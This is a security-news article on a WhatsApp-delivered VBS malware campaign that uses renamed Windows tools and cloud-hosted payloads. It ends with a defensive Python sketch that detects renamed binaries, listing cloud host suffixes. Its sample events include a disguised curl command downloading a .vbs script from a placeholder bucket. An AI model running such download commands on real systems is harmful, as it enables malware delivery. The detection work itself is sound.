Microsoft has described a campaign that uses WhatsApp messages to spread malicious Visual Basic Script (VBS) files. The lures used by the threat actors are still unknown. The campaign combines social engineering with stealth techniques.

It uses renamed Windows tools to blend in with normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to keep control of the target systems. Microsoft said that combining legitimate software with trusted platforms is a powerful way for threat actors to blend in with normal network activity and greatly improve their chances of success in attacks.

It also said that this campaign shows a complex infection chain that combines social engineering (messages sent through WhatsApp), stealth techniques (renaming legitimate tools and hiding features), and cloud-based payload hosting. The chain includes legitimate tools like AnyDesk that give attackers persistent remote access, which they can use to steal data or install more malware. They do this by downloading additional VBScript files from AWS S3, Tencent Cloud, or Backblaze B2 through renamed binaries.
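
A defender can hunt for the renamed-binary behaviour described above by comparing a process's file name on disk with the `OriginalFileName` stored in its PE version resource, a field Sysmon records in process-creation events (Event ID 1). The sketch below is an added example, not code from Microsoft's report or from this article. The tool names, paths, bucket name and cloud host suffixes are constructed assumptions for illustration.

```python
import ntpath
import re
from urllib.parse import urlparse

# Assumption: host suffixes for AWS S3, Tencent Cloud COS and Backblaze B2.
CLOUD_SUFFIXES = (".amazonaws.com", ".myqcloud.com", ".backblazeb2.com")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def is_renamed(event):
    """True when the file name on disk differs from the PE OriginalFileName."""
    original = (event.get("OriginalFileName") or "").strip().lower()
    if original in ("", "-", "?"):
        return False  # no version resource recorded, so nothing to compare
    return ntpath.basename(event.get("Image", "")).lower() != original

def cloud_hosts(command_line):
    """Return hosts in the command line that belong to the listed services."""
    hosts = []
    for url in URL_RE.findall(command_line or ""):
        host = (urlparse(url).hostname or "").lower()
        if host.endswith(CLOUD_SUFFIXES):
            hosts.append(host)
    return hosts

def triage(events):
    """Flag renamed binaries; raise severity when they also reach cloud storage."""
    findings = []
    for ev in events:
        if not is_renamed(ev):
            continue
        hosts = cloud_hosts(ev.get("CommandLine"))
        findings.append({"image": ev["Image"], "original": ev["OriginalFileName"],
                         "hosts": hosts, "severity": "high" if hosts else "medium"})
    return findings

# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example-bucket.s3.amazonaws.com/a.json"},
    {"Image": r"C:\Users\Public\svchelper.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"svchelper.exe -o C:\Users\Public\a.vbs "
                    "https://example-bucket.s3.us-east-1.amazonaws.com/a.vbs"},
    {"Image": r"C:\ProgramData\upd.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "upd.exe /list"},
    {"Image": r"C:\Tools\legacy.exe", "OriginalFileName": "-",
     "CommandLine": "legacy.exe"},
]
```

Some legitimate software ships with a file name that differs from its `OriginalFileName`, so findings from a check like this need an allowlist before they drive alerts.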